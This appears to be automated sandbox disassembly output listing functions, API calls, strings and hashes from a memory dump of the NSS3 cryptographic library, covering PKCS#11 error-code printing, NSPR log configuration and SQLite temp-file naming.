Opcode ID: b7f11dbbce1650313e5bc0ab820ba110c9d772ef4b7c5c17b5ea1356e50c569b
Instruction ID: ff103f26b4c41fa79cd7239da6c36fc485e01eb61a9e7a4b7236c44a41fe54d7
Opcode Fuzzy Hash: b7f11dbbce1650313e5bc0ab820ba110c9d772ef4b7c5c17b5ea1356e50c569b
Instruction Fuzzy Hash: 5FE14E71A293409FDB84DF28D48475ABBF1FF8A318F118A1DF88997751D730A985CB82

Function 6CF95E60 Relevance: 1.4, APIs: 1, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 6CF95B90: PR_Lock.NSS3(00010000,?,00000000,?,6CE7DF9B), ref: 6CF95B9E
Part of subcall function 6CF95B90: PR_Unlock.NSS3 ref: 6CF95BEA

memset.VCRUNTIME140(00000014,00000000,-000000D7,?,?,?,?,?,?,?,?,6CF95E23,6CE7E154), ref: 6CF95EBF

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: LockUnlockmemset
String ID:
API String ID: 1725470033-0
Opcode ID: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction ID: 28acd78b225c89b5cfbc25fa73fa90840ea2de7625ac43d1c575f54a905bd737
Opcode Fuzzy Hash: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction Fuzzy Hash: 82518C72E0021A8FDF18CF59C8816AEF7B2FF98314B19866DD816B7755D730A941CBA0

Function 6CF4DCD0 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bf632f09c60f5f83f556546fe6c3fa29ee1b969137679dfee093f8a8a9cc6fd
Instruction ID: b1416e58b3dfa3b2ec2861a0abd19ed3c1b241553328e5370860adfd64f588e1
Opcode Fuzzy Hash: 7bf632f09c60f5f83f556546fe6c3fa29ee1b969137679dfee093f8a8a9cc6fd
Instruction Fuzzy Hash: 6BF16F71A01205CFDB48CF58C494BAABBB2BF89314F298168D8199F752CB35ED42CBD1

Function 6CEE1DC0 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction ID: 1ddb8fff057461bb2d6c0c04a758d809a59d654506cc073f41bb95016bce81a3
Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction Fuzzy Hash: 6ED14A729046568BDB118F58C8843DA7773AB9E3A8F2D4328DC641B7C6C3769946C7D0

Function 6CE78EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cc32137cdf1c3b0f6251d382855282fa25b4e6062054a8d836c436b95d20ff2
Instruction ID: 2f5a748b4edef03597203b63a639cf7ea87de31fb817b2d1b39ba94af208036f
Opcode Fuzzy Hash: 9cc32137cdf1c3b0f6251d382855282fa25b4e6062054a8d836c436b95d20ff2
Instruction Fuzzy Hash: A6110132A002098BD738DF24D888B5AB7B6FF4231CF24426AD8159FB41C375E882C7E1

Function 6CF50C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a094d5443d418c41bffc9ebddcd85a5b2d7383baa426bd0a8acbab838447dab
Instruction ID: 2aec7cfd507ab7d5a781ea8481ed437aaa55f810a2289a408661148afca01d8d
Opcode Fuzzy Hash: 4a094d5443d418c41bffc9ebddcd85a5b2d7383baa426bd0a8acbab838447dab
Instruction Fuzzy Hash: C111C1757043459FCB00DF28C8C466A77B2FF86368F14806DD9198B701DB71E816CBA0

Function 6CEC3FF0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Error
String ID:
API String ID: 2275178025-0
Opcode ID: 72064f31f6f738f720fd918165b65921d0cb4a22ce7086618069c8f3151a3395
Instruction ID: d5693cdb6a00cd961d5ff5d56a3d33cc3c2c6cf5db1ec0f6e7d90aae1b316627
Opcode Fuzzy Hash: 72064f31f6f738f720fd918165b65921d0cb4a22ce7086618069c8f3151a3395
Instruction Fuzzy Hash: 28F09A70E006598BCB40DF68C4802DEBBF4EF09244B108619EC89AB301EB30AA84C7C1

Function 6CF50D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: cc5137115f28886eb4d38733c1962f3b024ab90a0bfa7d78a3d75bf3f212b8d9
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 74E06D3A202054A7DB148E09C450BAA7359DF9271DFE58879CE599BA01DA73F8138781

Function 6CE7CC60 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd5868ed676be0b52d333d0a1b942a36cc0f7891b01f016925389cfa801e2780
Instruction ID: 18f80d815ad8cf53401913ff02d2a1ced06bb43b1fdf36bf5c131d7800333061
Opcode Fuzzy Hash: bd5868ed676be0b52d333d0a1b942a36cc0f7891b01f016925389cfa801e2780
Instruction Fuzzy Hash: C5C09238254708DFC784DF48E489EA43BFAFF0D61070400A8EA028B721DB31FD00CA80

Function 6CEB1D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6CEB1D46), ref: 6CEB2345

Strings

CKR_FUNCTION_NOT_PARALLEL, xrefs: 6CEB218D
CKR_FUNCTION_REJECTED, xrefs: 6CEB2289
CKR_RANDOM_SEED_NOT_SUPPORTED, xrefs: 6CEB22FF
CKR_PIN_LEN_RANGE, xrefs: 6CEB2061
CKR_OBJECT_HANDLE_INVALID, xrefs: 6CEB204D
CKR_WRAPPING_KEY_HANDLE_INVALID, xrefs: 6CEB2320
CKR_SIGNATURE_LEN_RANGE, xrefs: 6CEB20D9
CKR_RANDOM_NO_RNG, xrefs: 6CEB22A7
CKR_ENCRYPTED_DATA_INVALID, xrefs: 6CEB226B
CKR_PIN_EXPIRED, xrefs: 6CEB206B
CKR_FUNCTION_CANCELED, xrefs: 6CEB1E73
CKR_OPERATION_NOT_INITIALIZED, xrefs: 6CEB1FD7
CKR_WRAPPED_KEY_LEN_RANGE, xrefs: 6CEB2319
CKR_DEVICE_REMOVED, xrefs: 6CEB2261
CKR_PIN_LOCKED, xrefs: 6CEB2075
CKR_TOKEN_WRITE_PROTECTED, xrefs: 6CEB1DE0
CKR_OPERATION_ACTIVE, xrefs: 6CEB22B8
CKR_STATE_UNSAVEABLE, xrefs: 6CEB2037
CKR_OK, xrefs: 6CEB1DFC
CKR_WRAPPED_KEY_INVALID, xrefs: 6CEB1FB5
CKR_TEMPLATE_INCOMPLETE, xrefs: 6CEB1F95
CKR_WRAPPING_KEY_SIZE_RANGE, xrefs: 6CEB2327
CKR_BUFFER_TOO_SMALL, xrefs: 6CEB2183
CKR_WRAPPING_KEY_TYPE_INCONSISTENT, xrefs: 6CEB232E
CKR_DEVICE_MEMORY, xrefs: 6CEB1FF3
rv = 0x%x, xrefs: 6CEB2312
CKR_TOKEN_NOT_PRESENT, xrefs: 6CEB1F81
CKR_DOMAIN_PARAMS_INVALID, xrefs: 6CEB2015
CKR_CRYPTOKI_ALREADY_INITIALIZED, xrefs: 6CEB227F
CKR_PIN_INCORRECT, xrefs: 6CEB1D92
CKR_OPERATION_CANCEL_FAILED, xrefs: 6CEB1F77
CKR_TOKEN_RESOURCE_EXCEEDED, xrefs: 6CEB2293, 6CEB233F
CKR_ENCRYPTED_DATA_LEN_RANGE, xrefs: 6CEB1F0F
CKR_CRYPTOKI_NOT_INITIALIZED, xrefs: 6CEB2275
CKR_SAVED_STATE_INVALID, xrefs: 6CEB1E56
rv = %s, xrefs: 6CEB2340
CKR_INFORMATION_SENSITIVE, xrefs: 6CEB22B1
CKR_SIGNATURE_INVALID, xrefs: 6CEB20CF
CKR_TEMPLATE_INCONSISTENT, xrefs: 6CEB1EE1
CKR_PIN_INVALID, xrefs: 6CEB2057
CKR_TOKEN_NOT_RECOGNIZED, xrefs: 6CEB1F8B
CKR_CURVE_NOT_SUPPORTED, xrefs: 6CEB2179
CKR_DEVICE_ERROR, xrefs: 6CEB229D
CKR_MUTEX_NOT_LOCKED, xrefs: 6CEB2225
CKR_NEXT_OTP, xrefs: 6CEB222F
CKR_MUTEX_BAD, xrefs: 6CEB1F49
CKR_NEW_PIN_MODE, xrefs: 6CEB1E9F

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Print
String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
API String ID: 3558298466-1980531169
Opcode ID: ab3709e5bf0d57bb5e43a59fbd38a10f49d743ba963ef8dc11d2c32915f2a6f8
Instruction ID: 538d737369fbddcb149f1368c6f9e3de13422afd3d3233e26cccfaa4ae3f8c54
Opcode Fuzzy Hash: ab3709e5bf0d57bb5e43a59fbd38a10f49d743ba963ef8dc11d2c32915f2a6f8
Instruction Fuzzy Hash: AC61D720B4D047C6EA1C448C83AA37E2130AF67718F74C57BE591BFF91C6B9CA865693

Function 6CEE5DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6CEE5E08
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CEE5E3F
PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6CEE5E5C
free.MOZGLUE(00000000), ref: 6CEE5E7E
free.MOZGLUE(00000000), ref: 6CEE5E97
PORT_Strdup_Util.NSS3(secmod.db), ref: 6CEE5EA5
_NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6CEE5EBB
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CEE5ECB
PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6CEE5EF0
free.MOZGLUE(00000000), ref: 6CEE5F12
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CEE5F35
PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6CEE5F5B
free.MOZGLUE(00000000), ref: 6CEE5F82
PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6CEE5FA3
PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6CEE5FB7
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CEE5FC4
free.MOZGLUE(00000000), ref: 6CEE5FDB
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CEE5FE9
free.MOZGLUE(00000000), ref: 6CEE5FFE
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CEE600C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CEE6027
PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6CEE605A
PR_smprintf.NSS3(6CFBAAF9,00000000), ref: 6CEE606A
free.MOZGLUE(00000000), ref: 6CEE607C
free.MOZGLUE(00000000), ref: 6CEE609A
free.MOZGLUE(00000000), ref: 6CEE60B2
free.MOZGLUE(?), ref: 6CEE60CE

Strings

configDir=, xrefs: 6CEE5F9D
secmod.db, xrefs: 6CEE5EA0
pkcs11.txt, xrefs: 6CEE5F47, 6CEE5F7C, 6CEE603A, 6CEE6053
%s/%s, xrefs: 6CEE6055
secmod=, xrefs: 6CEE5FB1
forceSecmodChoice, xrefs: 6CEE5F55
readOnly, xrefs: 6CEE5E56
noModDB, xrefs: 6CEE5EEA
flags, xrefs: 6CEE5E3A, 6CEE5EC6, 6CEE5F30

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
API String ID: 1427204090-154007103
Opcode ID: 19409fe398660bfb9c90b820e4b9cefd98eb0831e29d8fd083215314ea13cefb
Instruction ID: 42cd8103600c0644db71934654d2cb2b07ece90f90144d6ce0d47e91cb6aa854
Opcode Fuzzy Hash: 19409fe398660bfb9c90b820e4b9cefd98eb0831e29d8fd083215314ea13cefb
Instruction Fuzzy Hash: 2791E4F4A052155BEB119B359C81BAA3BB89F0E3CCF280065ED55DBB42EB31D905C7A2

Function 6CE71D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3 ref: 6CE71DA3

Part of subcall function 6CF498D0: calloc.MOZGLUE(00000001,00000084,6CE70936,00000001,?,6CE7102C), ref: 6CF498E5

PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6CE71DB2

Part of subcall function 6CE71240: TlsGetValue.KERNEL32(00000040,?,6CE7116C,NSPR_LOG_MODULES), ref: 6CE71267
Part of subcall function 6CE71240: EnterCriticalSection.KERNEL32(?,?,?,6CE7116C,NSPR_LOG_MODULES), ref: 6CE7127C
Part of subcall function 6CE71240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CE7116C,NSPR_LOG_MODULES), ref: 6CE71291
Part of subcall function 6CE71240: PR_Unlock.NSS3(?,?,?,?,6CE7116C,NSPR_LOG_MODULES), ref: 6CE712A0

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE71DD8
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6CE71E4F
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6CE71EA4
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6CE71ECD
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6CE71EEF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6CE71F17
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CE71F34
PR_SetLogBuffering.NSS3(00004000), ref: 6CE71F61
PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6CE71F6E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CE71F83
PR_SetLogFile.NSS3(00000000), ref: 6CE71FA2
PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6CE71FB8
OutputDebugStringA.KERNEL32(00000000), ref: 6CE71FCB
free.MOZGLUE(00000000), ref: 6CE71FD2

Strings

timestamp, xrefs: 6CE71EC4
all, xrefs: 6CE71F0E
append, xrefs: 6CE71EE6
sync, xrefs: 6CE71E46
%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n, xrefs: 6CE71E27
NSPR_LOG_FILE, xrefs: 6CE71F69
NSPR_LOG_MODULES, xrefs: 6CE71DAD
Unable to create nspr log file '%s', xrefs: 6CE71FB3
, %n, xrefs: 6CE71E6B
bufsize, xrefs: 6CE71E9B

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
API String ID: 2013311973-4000297177
Opcode ID: 88b8fdc947a5ab2428e11e63e034f319ebebf65a393610dd658f39915dccb761
Instruction ID: fde09cdd071604ac6306eec0a986f384d3ab9a9ad9136ab734a171d2442d3d70
Opcode Fuzzy Hash: 88b8fdc947a5ab2428e11e63e034f319ebebf65a393610dd658f39915dccb761
Instruction Fuzzy Hash: B35190B1E003099BDF10DBE5DD55B9E77B8AF0530DF280528E919EB605E771E908CB61

Function 6CF56E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CE0CA30: EnterCriticalSection.KERNEL32(?,?,?,6CE6F9C9,?,6CE6F4DA,6CE6F9C9,?,?,6CE3369A), ref: 6CE0CA7A
Part of subcall function 6CE0CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CE0CB26

memset.VCRUNTIME140(00000000,00000000,?,?,6CE1BE66), ref: 6CF56E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6CE1BE66), ref: 6CF56E98
sqlite3_snprintf.NSS3(?,00000000,6CFBAAF9,?,?,?,?,?,?,6CE1BE66), ref: 6CF56EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6CE1BE66), ref: 6CF56ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6CE1BE66), ref: 6CF56EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6CE1BE66), ref: 6CF56F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6CE1BE66), ref: 6CF56F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6CE1BE66), ref: 6CF56F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6CE1BE66), ref: 6CF56FA6
sqlite3_snprintf.NSS3(?,00000000,6CFBAAF9,00000000,?,?,?,?,?,?,?,6CE1BE66), ref: 6CF56FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6CE1BE66), ref: 6CF56FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CE1BE66), ref: 6CF56FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CE1BE66), ref: 6CF57014
sqlite3_free.NSS3(00000000,?,?,?,?,6CE1BE66), ref: 6CF5701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6CE1BE66), ref: 6CF57030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6CE1BE66), ref: 6CF5705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6CE1BE66), ref: 6CF57079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CE1BE66), ref: 6CF57097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6CE1BE66), ref: 6CF570A0

Strings

winGetTempname2, xrefs: 6CF570C4
winGetTempname1, xrefs: 6CF5708F
mz_etilqs_, xrefs: 6CF56F18
